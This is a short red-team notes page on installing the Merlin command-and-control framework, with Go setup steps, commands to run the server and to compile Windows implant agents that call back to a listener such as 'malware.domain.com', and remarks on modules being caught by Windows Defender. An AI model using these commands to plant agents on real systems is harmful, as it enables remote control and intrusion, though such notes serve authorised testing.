Merlin

https://github.com/Ne0nd0g/merlin

Installation

Install GO

#Download GO package from: https://golang.org/dl/
#Decompress the packe using:
tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz

#Change /etc/profile
Add ":/usr/local/go/bin" to PATH
Add "export GOPATH=$HOME/go"
Add "export GOBIN=$GOPATH/bin"

source /etc/profile

Install Merlin

go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/

Launch Merlin Server

go run cmd/merlinserver/main.go -i

Merlin Agents

Compile Agents

Go to the main folder $GOPATH/src/github.com/Ne0nd0g/merlin/

#User URL param to set the listener URL
make #Server and Agents of all
make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)

Manual compile agents

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g

Modules

The bad news is that every module used by Merlin is downloaded from the source (github) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!

Didn't check persistence modules

Resume

I really like the feeling and the potential of the tool. I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.

Last updated

Was this helpful?